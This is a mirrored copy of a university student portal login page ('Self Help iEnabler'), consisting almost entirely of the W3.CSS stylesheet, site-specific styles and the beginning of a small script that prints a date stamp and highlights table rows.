<!DOCTYPE html>

<html>
<title>Self Help iEnabler</title>
<!-- Mirrored from ulc-prod-webserver.ul.ac.za/pls/prodi41/w99pkg.mi_login by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 07 Jul 2025 16:46:43 GMT -->
<meta content="text/html;charset=utf-8" http-equiv="content-type"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<style>ï»¿/* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */
html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}
/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */
html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}
article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}
audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}
audio:not([controls]){display:none;height:0}[hidden],template{display:none}
a{background-color:transparent}a:active,a:hover{outline-width:0}
abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}
b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}
small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}
sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}
code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}hr{box-sizing:content-box;height:0;overflow:visible}
button,input,select,textarea,optgroup{font:inherit;margin:0}optgroup{font-weight:bold}
button,input{overflow:visible}button,select{text-transform:none}
button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}
button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}
button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}
fieldset{border:1px solid #c0c0c0;margin:0 2px;padding:.35em .625em .75em}
legend{color:inherit;display:table;max-width:100%;padding:0;white-space:normal}textarea{overflow:auto}
[type=checkbox],[type=radio]{padding:0}
[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}
[type=search]{-webkit-appearance:textfield;outline-offset:-2px}
[type=search]::-webkit-search-decoration{-webkit-appearance:none}
::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}
/* End extract */
html,body{font-family:Verdana,sans-serif;font-size:15px;line-height:1.5}html{overflow-x:hidden}
h1{font-size:36px}h2{font-size:30px}h3{font-size:24px}h4{font-size:20px}h5{font-size:18px}h6{font-size:16px}
.w3-serif{font-family:serif}.w3-sans-serif{font-family:sans-serif}.w3-cursive{font-family:cursive}.w3-monospace{font-family:monospace}
h1,h2,h3,h4,h5,h6{font-family:"Segoe UI",Arial,sans-serif;font-weight:400;margin:10px 0}.w3-wide{letter-spacing:4px}
hr{border:0;border-top:1px solid #eee;margin:20px 0}
.w3-image{max-width:100%;height:auto}img{vertical-align:middle}a{color:inherit}
.w3-table,.w3-table-all{border-collapse:collapse;border-spacing:0;width:100%;display:table}.w3-table-all{border:1px solid #ccc}
.w3-bordered tr,.w3-table-all tr{border-bottom:1px solid #ddd}.w3-striped tbody tr:nth-child(even){background-color:#f1f1f1}
.w3-table-all tr:nth-child(odd){background-color:#fff}.w3-table-all tr:nth-child(even){background-color:#f1f1f1}
.w3-hoverable tbody tr:hover,.w3-ul.w3-hoverable li:hover{background-color:#ccc}.w3-centered tr th,.w3-centered tr td{text-align:center}
.w3-table td,.w3-table th,.w3-table-all td,.w3-table-all th{padding:8px 8px;display:table-cell;text-align:left;vertical-align:top}
.w3-table th:first-child,.w3-table td:first-child,.w3-table-all th:first-child,.w3-table-all td:first-child{padding-left:16px}
.w3-btn,.w3-button{border:none;display:inline-block;padding:8px 16px;vertical-align:middle;overflow:hidden;text-decoration:none;color:inherit;background-color:inherit;text-align:center;cursor:pointer;white-space:nowrap}
.w3-btn:hover{box-shadow:0 8px 16px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19)}
.w3-btn,.w3-button{-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}   
.w3-disabled,.w3-btn:disabled,.w3-button:disabled{cursor:not-allowed;opacity:0.3}.w3-disabled *,:disabled *{pointer-events:none}
.w3-btn.w3-disabled:hover,.w3-btn:disabled:hover{box-shadow:none}
.w3-badge,.w3-tag{background-color:#000;color:#fff;display:inline-block;padding-left:8px;padding-right:8px;text-align:center}.w3-badge{border-radius:50%}
.w3-ul{list-style-type:none;padding:0;margin:0}.w3-ul li{padding:8px 16px;border-bottom:1px solid #ddd}.w3-ul li:last-child{border-bottom:none}
.w3-tooltip,.w3-display-container{position:relative}.w3-tooltip .w3-text{display:none}.w3-tooltip:hover .w3-text{display:inline-block}
.w3-ripple:active{opacity:0.5}.w3-ripple{transition:opacity 0s}
.w3-input{padding:8px;display:block;border:none;border-bottom:1px solid #ccc;width:100%}
.w3-select{padding:9px 0;width:100%;border:none;border-bottom:1px solid #ccc}
.w3-dropdown-click,.w3-dropdown-hover{position:relative;display:inline-block;cursor:pointer}
.w3-dropdown-hover:hover .w3-dropdown-content{display:block}
.w3-dropdown-hover:first-child,.w3-dropdown-click:hover{background-color:#ccc;color:#000}
.w3-dropdown-hover:hover > .w3-button:first-child,.w3-dropdown-click:hover > .w3-button:first-child{background-color:#ccc;color:#000}
.w3-dropdown-content{cursor:auto;color:#000;background-color:#fff;display:none;position:absolute;min-width:160px;margin:0;padding:0;z-index:1}
.w3-check,.w3-radio{width:24px;height:24px;position:relative;top:6px}
.w3-sidebar{height:100%;width:200px;background-color:#fff;position:fixed!important;z-index:1;overflow:auto}
.w3-bar-block .w3-dropdown-hover,.w3-bar-block .w3-dropdown-click{width:100%}
.w3-bar-block .w3-dropdown-hover .w3-dropdown-content,.w3-bar-block .w3-dropdown-click .w3-dropdown-content{min-width:100%}
.w3-bar-block .w3-dropdown-hover .w3-button,.w3-bar-block .w3-dropdown-click .w3-button{width:100%;text-align:left;padding:8px 16px}
.w3-main,#main{transition:margin-left .4s}
.w3-modal{z-index:3;display:none;padding-top:100px;position:fixed;left:0;top:0;width:100%;height:100%;overflow:auto;background-color:rgb(0,0,0);background-color:rgba(0,0,0,0.4)}
.w3-modal-content{margin:auto;background-color:#fff;position:relative;padding:0;outline:0;width:600px}
.w3-bar{width:100%;overflow:hidden}.w3-center .w3-bar{display:inline-block;width:auto}
.w3-bar .w3-bar-item{padding:8px 16px;float:left;width:auto;border:none;display:block;outline:0}
.w3-bar .w3-dropdown-hover,.w3-bar .w3-dropdown-click{position:static;float:left}
.w3-bar .w3-button{white-space:normal}
.w3-bar-block .w3-bar-item{width:100%;display:block;padding:8px 16px;text-align:left;border:none;white-space:normal;float:none;outline:0}
.w3-bar-block.w3-center .w3-bar-item{text-align:center}.w3-block{display:block;width:100%}
.w3-responsive{display:block;overflow-x:auto}
.w3-container:after,.w3-container:before,.w3-panel:after,.w3-panel:before,.w3-row:after,.w3-row:before,.w3-row-padding:after,.w3-row-padding:before,
.w3-cell-row:before,.w3-cell-row:after,.w3-clear:after,.w3-clear:before,.w3-bar:before,.w3-bar:after{content:"";display:table;clear:both}
.w3-col,.w3-half,.w3-third,.w3-twothird,.w3-threequarter,.w3-quarter{float:left;width:100%}
.w3-col.s1{width:8.33333%}.w3-col.s2{width:16.66666%}.w3-col.s3{width:24.99999%}.w3-col.s4{width:33.33333%}
.w3-col.s5{width:41.66666%}.w3-col.s6{width:49.99999%}.w3-col.s7{width:58.33333%}.w3-col.s8{width:66.66666%}
.w3-col.s9{width:74.99999%}.w3-col.s10{width:83.33333%}.w3-col.s11{width:91.66666%}.w3-col.s12{width:99.99999%}
@media (min-width:601px){.w3-col.m1{width:8.33333%}.w3-col.m2{width:16.66666%}.w3-col.m3,.w3-quarter{width:24.99999%}.w3-col.m4,.w3-third{width:33.33333%}
.w3-col.m5{width:41.66666%}.w3-col.m6,.w3-half{width:49.99999%}.w3-col.m7{width:58.33333%}.w3-col.m8,.w3-twothird{width:66.66666%}
.w3-col.m9,.w3-threequarter{width:74.99999%}.w3-col.m10{width:83.33333%}.w3-col.m11{width:91.66666%}.w3-col.m12{width:99.99999%}}
@media (min-width:993px){.w3-col.l1{width:8.33333%}.w3-col.l2{width:16.66666%}.w3-col.l3{width:24.99999%}.w3-col.l4{width:33.33333%}
.w3-col.l5{width:41.66666%}.w3-col.l6{width:49.99999%}.w3-col.l7{width:58.33333%}.w3-col.l8{width:66.66666%}
.w3-col.l9{width:74.99999%}.w3-col.l10{width:83.33333%}.w3-col.l11{width:91.66666%}.w3-col.l12{width:99.99999%}}
.w3-rest{overflow:hidden}.w3-stretch{margin-left:-16px;margin-right:-16px}
.w3-content,.w3-auto{margin-left:auto;margin-right:auto}.w3-content{max-width:980px}.w3-auto{max-width:1140px}
.w3-cell-row{display:table;width:100%}.w3-cell{display:table-cell}
.w3-cell-top{vertical-align:top}.w3-cell-middle{vertical-align:middle}.w3-cell-bottom{vertical-align:bottom}
.w3-hide{display:none!important}.w3-show-block,.w3-show{display:block!important}.w3-show-inline-block{display:inline-block!important}
@media (max-width:1205px){.w3-auto{max-width:95%}}
@media (max-width:600px){.w3-modal-content{margin:0 10px;width:auto!important}.w3-modal{padding-top:30px}
.w3-dropdown-hover.w3-mobile .w3-dropdown-content,.w3-dropdown-click.w3-mobile .w3-dropdown-content{position:relative}	
.w3-hide-small{display:none!important}.w3-mobile{display:block;width:100%!important}.w3-bar-item.w3-mobile,.w3-dropdown-hover.w3-mobile,.w3-dropdown-click.w3-mobile{text-align:center}
.w3-dropdown-hover.w3-mobile,.w3-dropdown-hover.w3-mobile .w3-btn,.w3-dropdown-hover.w3-mobile .w3-button,.w3-dropdown-click.w3-mobile,.w3-dropdown-click.w3-mobile .w3-btn,.w3-dropdown-click.w3-mobile .w3-button{width:100%}}
@media (max-width:768px){.w3-modal-content{width:500px}.w3-modal{padding-top:50px}}
@media (min-width:993px){.w3-modal-content{width:900px}.w3-hide-large{display:none!important}.w3-sidebar.w3-collapse{display:block!important}}
@media (max-width:992px) and (min-width:601px){.w3-hide-medium{display:none!important}}
@media (max-width:992px){.w3-sidebar.w3-collapse{display:none}.w3-main{margin-left:0!important;margin-right:0!important}.w3-auto{max-width:100%}}
.w3-top,.w3-bottom{position:fixed;width:100%;z-index:1}.w3-top{top:0}.w3-bottom{bottom:0}
.w3-overlay{position:fixed;display:none;width:100%;height:100%;top:0;left:0;right:0;bottom:0;background-color:rgba(0,0,0,0.5);z-index:2}
.w3-display-topleft{position:absolute;left:0;top:0}.w3-display-topright{position:absolute;right:0;top:0}
.w3-display-bottomleft{position:absolute;left:0;bottom:0}.w3-display-bottomright{position:absolute;right:0;bottom:0}
.w3-display-middle{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}
.w3-display-left{position:absolute;top:50%;left:0%;transform:translate(0%,-50%);-ms-transform:translate(-0%,-50%)}
.w3-display-right{position:absolute;top:50%;right:0%;transform:translate(0%,-50%);-ms-transform:translate(0%,-50%)}
.w3-display-topmiddle{position:absolute;left:50%;top:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}
.w3-display-bottommiddle{position:absolute;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}
.w3-display-container:hover .w3-display-hover{display:block}.w3-display-container:hover span.w3-display-hover{display:inline-block}.w3-display-hover{display:none}
.w3-display-position{position:absolute}
.w3-circle{border-radius:50%}
.w3-round-small{border-radius:2px}.w3-round,.w3-round-medium{border-radius:4px}.w3-round-large{border-radius:8px}.w3-round-xlarge{border-radius:16px}.w3-round-xxlarge{border-radius:32px}
.w3-row-padding,.w3-row-padding>.w3-half,.w3-row-padding>.w3-third,.w3-row-padding>.w3-twothird,.w3-row-padding>.w3-threequarter,.w3-row-padding>.w3-quarter,.w3-row-padding>.w3-col{padding:0 8px}
.w3-container,.w3-panel{padding:0.01em 16px}.w3-panel{margin-top:16px;margin-bottom:16px}
.w3-code,.w3-codespan{font-family:Consolas,"courier new";font-size:16px}
.w3-code{width:auto;background-color:#fff;padding:8px 12px;border-left:4px solid #4CAF50;word-wrap:break-word}
.w3-codespan{color:crimson;background-color:#f1f1f1;padding-left:4px;padding-right:4px;font-size:110%}
.w3-card,.w3-card-2{box-shadow:0 2px 5px 0 rgba(0,0,0,0.16),0 2px 10px 0 rgba(0,0,0,0.12)}
.w3-card-4,.w3-hover-shadow:hover{box-shadow:0 4px 10px 0 rgba(0,0,0,0.2),0 4px 20px 0 rgba(0,0,0,0.19)}
.w3-spin{animation:w3-spin 2s infinite linear}@keyframes w3-spin{0%{transform:rotate(0deg)}100%{transform:rotate(359deg)}}
.w3-animate-fading{animation:fading 10s infinite}@keyframes fading{0%{opacity:0}50%{opacity:1}100%{opacity:0}}
.w3-animate-opacity{animation:opac 0.8s}@keyframes opac{from{opacity:0} to{opacity:1}}
.w3-animate-top{position:relative;animation:animatetop 0.4s}@keyframes animatetop{from{top:-300px;opacity:0} to{top:0;opacity:1}}
.w3-animate-left{position:relative;animation:animateleft 0.4s}@keyframes animateleft{from{left:-300px;opacity:0} to{left:0;opacity:1}}
.w3-animate-right{position:relative;animation:animateright 0.4s}@keyframes animateright{from{right:-300px;opacity:0} to{right:0;opacity:1}}
.w3-animate-bottom{position:relative;animation:animatebottom 0.4s}@keyframes animatebottom{from{bottom:-300px;opacity:0} to{bottom:0;opacity:1}}
.w3-animate-zoom {animation:animatezoom 0.6s}@keyframes animatezoom{from{transform:scale(0)} to{transform:scale(1)}}
.w3-animate-input{transition:width 0.4s ease-in-out}.w3-animate-input:focus{width:100%!important}
.w3-opacity,.w3-hover-opacity:hover{opacity:0.60}.w3-opacity-off,.w3-hover-opacity-off:hover{opacity:1}
.w3-opacity-max{opacity:0.25}.w3-opacity-min{opacity:0.75}
.w3-greyscale-max,.w3-grayscale-max,.w3-hover-greyscale:hover,.w3-hover-grayscale:hover{filter:grayscale(100%)}
.w3-greyscale,.w3-grayscale{filter:grayscale(75%)}.w3-greyscale-min,.w3-grayscale-min{filter:grayscale(50%)}
.w3-sepia{filter:sepia(75%)}.w3-sepia-max,.w3-hover-sepia:hover{filter:sepia(100%)}.w3-sepia-min{filter:sepia(50%)}
.w3-tiny{font-size:10px!important}.w3-small{font-size:12px!important}.w3-medium{font-size:15px!important}.w3-large{font-size:18px!important}
.w3-xlarge{font-size:24px!important}.w3-xxlarge{font-size:36px!important}.w3-xxxlarge{font-size:48px!important}.w3-jumbo{font-size:64px!important}
.w3-left-align{text-align:left!important}.w3-right-align{text-align:right!important}.w3-justify{text-align:justify!important}.w3-center{text-align:center!important}
.w3-border-0{border:0!important}.w3-border{border:1px solid #ccc!important}
.w3-border-top{border-top:1px solid #ccc!important}.w3-border-bottom{border-bottom:1px solid #ccc!important}
.w3-border-left{border-left:1px solid #ccc!important}.w3-border-right{border-right:1px solid #ccc!important}
.w3-topbar{border-top:6px solid #ccc!important}.w3-bottombar{border-bottom:6px solid #ccc!important}
.w3-leftbar{border-left:6px solid #ccc!important}.w3-rightbar{border-right:6px solid #ccc!important}
.w3-section,.w3-code{margin-top:16px!important;margin-bottom:16px!important}
.w3-margin{margin:16px!important}.w3-margin-top{margin-top:16px!important}.w3-margin-bottom{margin-bottom:16px!important}
.w3-margin-left{margin-left:16px!important}.w3-margin-right{margin-right:16px!important}
.w3-padding-small{padding:4px 8px!important}.w3-padding{padding:8px 16px!important}.w3-padding-large{padding:12px 24px!important}
.w3-padding-16{padding-top:16px!important;padding-bottom:16px!important}.w3-padding-24{padding-top:24px!important;padding-bottom:24px!important}
.w3-padding-32{padding-top:32px!important;padding-bottom:32px!important}.w3-padding-48{padding-top:48px!important;padding-bottom:48px!important}
.w3-padding-64{padding-top:64px!important;padding-bottom:64px!important}
.w3-padding-top-64{padding-top:64px!important}.w3-padding-top-48{padding-top:48px!important}
.w3-padding-top-32{padding-top:32px!important}.w3-padding-top-24{padding-top:24px!important}
.w3-left{float:left!important}.w3-right{float:right!important}
.w3-button:hover{color:#000!important;background-color:#ccc!important}
.w3-transparent,.w3-hover-none:hover{background-color:transparent!important}
.w3-hover-none:hover{box-shadow:none!important}
/* Colors */
.w3-amber,.w3-hover-amber:hover{color:#000!important;background-color:#ffc107!important}
.w3-aqua,.w3-hover-aqua:hover{color:#000!important;background-color:#00ffff!important}
.w3-blue,.w3-hover-blue:hover{color:#fff!important;background-color:#2196F3!important}
.w3-light-blue,.w3-hover-light-blue:hover{color:#000!important;background-color:#87CEEB!important}
.w3-brown,.w3-hover-brown:hover{color:#fff!important;background-color:#795548!important}
.w3-cyan,.w3-hover-cyan:hover{color:#000!important;background-color:#00bcd4!important}
.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}
.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#4CAF50!important}
.w3-light-green,.w3-hover-light-green:hover{color:#000!important;background-color:#8bc34a!important}
.w3-indigo,.w3-hover-indigo:hover{color:#fff!important;background-color:#3f51b5!important}
.w3-khaki,.w3-hover-khaki:hover{color:#000!important;background-color:#f0e68c!important}
.w3-lime,.w3-hover-lime:hover{color:#000!important;background-color:#cddc39!important}
.w3-orange,.w3-hover-orange:hover{color:#000!important;background-color:#ff9800!important}
.w3-deep-orange,.w3-hover-deep-orange:hover{color:#fff!important;background-color:#ff5722!important}
.w3-pink,.w3-hover-pink:hover{color:#fff!important;background-color:#e91e63!important}
.w3-purple,.w3-hover-purple:hover{color:#fff!important;background-color:#9c27b0!important}
.w3-deep-purple,.w3-hover-deep-purple:hover{color:#fff!important;background-color:#673ab7!important}
.w3-red,.w3-hover-red:hover{color:#fff!important;background-color:#f44336!important}
.w3-sand,.w3-hover-sand:hover{color:#000!important;background-color:#fdf5e6!important}
.w3-teal,.w3-hover-teal:hover{color:#fff!important;background-color:#009688!important}
.w3-yellow,.w3-hover-yellow:hover{color:#000!important;background-color:#ffeb3b!important}
.w3-white,.w3-hover-white:hover{color:#000!important;background-color:#fff!important}
.w3-black,.w3-hover-black:hover{color:#fff!important;background-color:#000!important}
.w3-grey,.w3-hover-grey:hover,.w3-gray,.w3-hover-gray:hover{color:#000!important;background-color:#9e9e9e!important}
.w3-light-grey,.w3-hover-light-grey:hover,.w3-light-gray,.w3-hover-light-gray:hover{color:#000!important;background-color:#f1f1f1!important}
.w3-dark-grey,.w3-hover-dark-grey:hover,.w3-dark-gray,.w3-hover-dark-gray:hover{color:#fff!important;background-color:#616161!important}
.w3-pale-red,.w3-hover-pale-red:hover{color:#000!important;background-color:#ffdddd!important}
.w3-pale-green,.w3-hover-pale-green:hover{color:#000!important;background-color:#ddffdd!important}
.w3-pale-yellow,.w3-hover-pale-yellow:hover{color:#000!important;background-color:#ffffcc!important}
.w3-pale-blue,.w3-hover-pale-blue:hover{color:#000!important;background-color:#ddffff!important}
.w3-text-amber,.w3-hover-text-amber:hover{color:#ffc107!important}
.w3-text-aqua,.w3-hover-text-aqua:hover{color:#00ffff!important}
.w3-text-blue,.w3-hover-text-blue:hover{color:#2196F3!important}
.w3-text-light-blue,.w3-hover-text-light-blue:hover{color:#87CEEB!important}
.w3-text-brown,.w3-hover-text-brown:hover{color:#795548!important}
.w3-text-cyan,.w3-hover-text-cyan:hover{color:#00bcd4!important}
.w3-text-blue-grey,.w3-hover-text-blue-grey:hover,.w3-text-blue-gray,.w3-hover-text-blue-gray:hover{color:#607d8b!important}
.w3-text-green,.w3-hover-text-green:hover{color:#4CAF50!important}
.w3-text-light-green,.w3-hover-text-light-green:hover{color:#8bc34a!important}
.w3-text-indigo,.w3-hover-text-indigo:hover{color:#3f51b5!important}
.w3-text-khaki,.w3-hover-text-khaki:hover{color:#b4aa50!important}
.w3-text-lime,.w3-hover-text-lime:hover{color:#cddc39!important}
.w3-text-orange,.w3-hover-text-orange:hover{color:#ff9800!important}
.w3-text-deep-orange,.w3-hover-text-deep-orange:hover{color:#ff5722!important}
.w3-text-pink,.w3-hover-text-pink:hover{color:#e91e63!important}
.w3-text-purple,.w3-hover-text-purple:hover{color:#9c27b0!important}
.w3-text-deep-purple,.w3-hover-text-deep-purple:hover{color:#673ab7!important}
.w3-text-red,.w3-hover-text-red:hover{color:#f44336!important}
.w3-text-sand,.w3-hover-text-sand:hover{color:#fdf5e6!important}
.w3-text-teal,.w3-hover-text-teal:hover{color:#009688!important}
.w3-text-yellow,.w3-hover-text-yellow:hover{color:#d2be0e!important}
.w3-text-white,.w3-hover-text-white:hover{color:#fff!important}
.w3-text-black,.w3-hover-text-black:hover{color:#000!important}
.w3-text-grey,.w3-hover-text-grey:hover,.w3-text-gray,.w3-hover-text-gray:hover{color:#757575!important}
.w3-text-light-grey,.w3-hover-text-light-grey:hover,.w3-text-light-gray,.w3-hover-text-light-gray:hover{color:#f1f1f1!important}
.w3-text-dark-grey,.w3-hover-text-dark-grey:hover,.w3-text-dark-gray,.w3-hover-text-dark-gray:hover{color:#3a3a3a!important}
.w3-border-amber,.w3-hover-border-amber:hover{border-color:#ffc107!important}
.w3-border-aqua,.w3-hover-border-aqua:hover{border-color:#00ffff!important}
.w3-border-blue,.w3-hover-border-blue:hover{border-color:#2196F3!important}
.w3-border-light-blue,.w3-hover-border-light-blue:hover{border-color:#87CEEB!important}
.w3-border-brown,.w3-hover-border-brown:hover{border-color:#795548!important}
.w3-border-cyan,.w3-hover-border-cyan:hover{border-color:#00bcd4!important}
.w3-border-blue-grey,.w3-hover-border-blue-grey:hover,.w3-border-blue-gray,.w3-hover-border-blue-gray:hover{border-color:#607d8b!important}
.w3-border-green,.w3-hover-border-green:hover{border-color:#4CAF50!important}
.w3-border-light-green,.w3-hover-border-light-green:hover{border-color:#8bc34a!important}
.w3-border-indigo,.w3-hover-border-indigo:hover{border-color:#3f51b5!important}
.w3-border-khaki,.w3-hover-border-khaki:hover{border-color:#f0e68c!important}
.w3-border-lime,.w3-hover-border-lime:hover{border-color:#cddc39!important}
.w3-border-orange,.w3-hover-border-orange:hover{border-color:#ff9800!important}
.w3-border-deep-orange,.w3-hover-border-deep-orange:hover{border-color:#ff5722!important}
.w3-border-pink,.w3-hover-border-pink:hover{border-color:#e91e63!important}
.w3-border-purple,.w3-hover-border-purple:hover{border-color:#9c27b0!important}
.w3-border-deep-purple,.w3-hover-border-deep-purple:hover{border-color:#673ab7!important}
.w3-border-red,.w3-hover-border-red:hover{border-color:#f44336!important}
.w3-border-sand,.w3-hover-border-sand:hover{border-color:#fdf5e6!important}
.w3-border-teal,.w3-hover-border-teal:hover{border-color:#009688!important}
.w3-border-yellow,.w3-hover-border-yellow:hover{border-color:#ffeb3b!important}
.w3-border-white,.w3-hover-border-white:hover{border-color:#fff!important}
.w3-border-black,.w3-hover-border-black:hover{border-color:#000!important}
.w3-border-grey,.w3-hover-border-grey:hover,.w3-border-gray,.w3-hover-border-gray:hover{border-color:#9e9e9e!important}
.w3-border-light-grey,.w3-hover-border-light-grey:hover,.w3-border-light-gray,.w3-hover-border-light-gray:hover{border-color:#f1f1f1!important}
.w3-border-dark-grey,.w3-hover-border-dark-grey:hover,.w3-border-dark-gray,.w3-hover-border-dark-gray:hover{border-color:#616161!important}
.w3-border-pale-red,.w3-hover-border-pale-red:hover{border-color:#ffe7e7!important}.w3-border-pale-green,.w3-hover-border-pale-green:hover{border-color:#e7ffe7!important}
.w3-border-pale-yellow,.w3-hover-border-pale-yellow:hover{border-color:#ffffcc!important}.w3-border-pale-blue,.w3-hover-border-pale-blue:hover{border-color:#e7ffff!important}</style>
<style>/* *************************************************************************************
Program : its.css
X0_VERSION : v04.1.0.3
           : 270795
   *************************************************************************************
*/
.w3-sidebar a {
   font-family: "Roboto", sans-serif
}

body,
h1,
h2,
h3,
h4,
h5,
h6,
.w3-wide {
  font-family: "Montserrat", sans-serif;
}

.flex-container {
  display:flex; 
  flex-direction: column;
  justify-content: flex-start; 
  padding-bottom:5px; 
  flex-wrap: wrap;
}

.flex-menu {
  display:flex; 
  flex-direction: column;
  padding-top: 20px;
}

/* Tooltip */
.tooltip {
  position: relative; 
  display: inline-block;
}

.tooltip .tooltiptext {
  visibility: hidden; 
  width: 80px;
  font-size: 10px;
  background-color: blue; 
  color: #fff; 
  text-align: center; 
  border-radius: 3px; 
  padding: 2px 0; 
  /* Position the tooltip */ 
  position: absolute;
  z-index: 1;
  top: 100%;
  left: 50%;
  margin-left: -30px;
}

.tooltip .tooltiptext::after {
content: " ";
    position: absolute;
    bottom: 100%;  /* At the top of the tooltip */
    left: 50%;
    margin-left: -5px;
    border-width: 5px;
    border-style: solid;
    border-color: transparent transparent black transparent;
}

.tooltip:hover .tooltiptext {
  visibility: visible;
}

/* HEADER */
div.fra_header { 
  clear: both; 
  padding-top: 5px;
  padding-bottom: 10px; 
  width:100%;
  height: 35px;
	background-color: #EAEAEA;
  font-weight: bold;
  border-top-style: solid;
  border-top-color: black;
  border-top-width: 1px;
  border-bottom-style: solid;
  border-bottom-color: black;
  border-bottom-width: 1px;
}

div.fra_inst {
  color: #525252;
  text-align: right; 
  float: left; 
  padding-left: 5px;
}

div.fra_date {
  color: #525252;
  text-align: right; 
  float: right; 
  padding-right: 5px;
}

/* FOOTER */
.customfooter {
	background-color: #EAEAEA;
	color: #9C9E9C;
}

iframe {
  width:100%;
  height:auto;
  min-height: 780px;
  border:0;
}

#login_left {
  display: block;
}

#adaptit {
  display: none;
}

.detlContainer {
  background: white;
  display: none;  
  border-radius: 10px;
  border: 2px solid #C0C0C0;
  padding-left: 10px;
  padding-right: 10px;
}

/* Table header */
.tbl_header {
  font-weight: bold;
  background: white;
  border: 2px solid #C0C0C0;
  text-align: left;
}

/* Mandatory field asterisk */
.mandatory_fld {
	color: #FF0000; 
	font-weight: bold; 
}

/* Student dashboard */
#mainContainer {
  overflow:hidden;
}

#divBio {
  text-align: center;
}

.bioContainer {
  background: #E3EEF9;
  border-radius: 15px;
  border: 2px solid #C0C0C0;
  padding: 0px;
  width : 150px;
  }

.barContainer {
  background: #E3EEF9; 
  border-radius: 10px;
  border: 2px solid #C0C0C0;
}

.barContainer h3 { 
  padding-top: 0px;
  padding-bottom: 0px;
  margin-top: 0px;
  margin-bottom: 0px;
  text-align: center;
}

.detlContainer {
  background: white;
  display: none;  
  border-radius: 10px;
  border: 2px solid #C0C0C0;
  padding-left: 10px;
  padding-right: 10px;
}

tr.rlheader th {
border-left: 1px solid silver;
border-right: 1px solid silver;

}

tr.rldata td {
border-left: 1px solid silver;
border-right: 1px solid silver;

}

tr.rowover td {
  border-left: 1px solid silver;
  border-right: 1px solid silver;
 
}

tr.rldata td ul,tr.rowover td ul {
margin: 0px;
}
 
tr.smallHeadingOnLeft th, tr.smallHeadingOnLeft td {
  background: #4C9ED9;
  border-bottom: 1px solid silver;
  border-left: 2px solid white;
  border-top: 2px solid white;
  text-align: left;
  border-radius: 5px;
  font-size: 7pt;
}

tr.smallHeadingOnLeft h3 { 
  padding-top: 0px;
  padding-bottom: 0px;
  margin-top: 0px;
  margin-bottom: 0px;
  text-align: left;
  font-size: 7pt;
}

tr.smallHeadingOnLeft a { 
  text-decoration: none; 
  color: black; 
  font-size: 7pt;
}

tr.headingOnLeft th, tr.headingOnLeft td {
  background: #4C9ED9;
  border-bottom: 1px solid silver;
  border-left: 2px solid white;
  border-top: 2px solid white;
  text-align: left;
  border-radius: 5px;
}

.headingOnLeftH3 { 
  padding-top: 0px;
  padding-bottom: 0px;
  margin-top: 0px;
  margin-bottom: 0px;
  text-align: left;
} 

/* 231251 Student iEnabler student dashboard photo control */
#bioImage {
  overflow:hidden;
}

#bioImage img {
  width: 200px;
  height: 200px;
}

/* 231251 Logon page institution image control */
div.itslogimg img { 
  height:200px;  
 }

img.itsmnuimg {
  width:100px;
}

/* 231592 Input form control */
textarea {
  width : 100%;
}

label {
  font-weight: 600;
}

label.btnLabel {
  font-weight : 500;
}

span.spanMand {
  font-weight: 900;
  color: red;
}

@media print {
  #Header, #Footer { display: none !important; }
}
</style>
<script language="JavaScript1.2" type="text/javascript">/* ***************************************************************************
  Program : its_scripts.js
          : 270795
  X0_VERSION : v04.1.0.3
  ***************************************************************************
*/

<!-- Hide from old browsers

// #######
// Script: Setup Datestamp for printing in Header of all pages
function prt_header_datestamp () {
 days = new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday");
 months = new Array("January","February","March","April","May","June","July","August","September","October","November","December");
 var today = new Date();
 todayYear = today.getYear();
 todayMonth = months[today.getMonth()];
 todayDay = days[today.getDay()];
 todayDate = today.getDate();
 // Add to end of day number
 if (todayDate == 1 || todayDate == 21 || todayDate == 31) {
 todayDate += "st";
 }
 else {
 if (todayDate == 2 || todayDate == 22) {
 todayDate += "nd";
 }
 else {
 if (todayDate == 3 || todayDate == 23) {
 todayDate += "rd";
 }
 else {
 todayDate += "th";
 }
 }
 }
 // Define print format and write to screen.
 var dsString = todayDay + ", " + todayDate + " " + todayMonth + " " + 
                ((today.getFullYear() < 100) ? "19" : "") + today.getFullYear();
 document.write(dsString);
return(' ');
} // end prt_header_datestamp

// #######
// Script: Mouse over for items
  var x_oldstyle;
  function goOver(ctl)
  {
    // Set the offset as defined for this specific row. To be used for right-click logic
    ITS_Offset = ctl.getAttribute("its_offset");

    if (ctl.className != "rowover") 
       {
       x_oldstyle = ctl.className;
       ctl.className="rowover";
       }
  }
  function goOut(ctl) 
  {
    // Reset the offset back to "Page-level". To be used for right-click logic
    ITS_Offset = "0";
    ctl.className=x_oldstyle;
  }

// #######
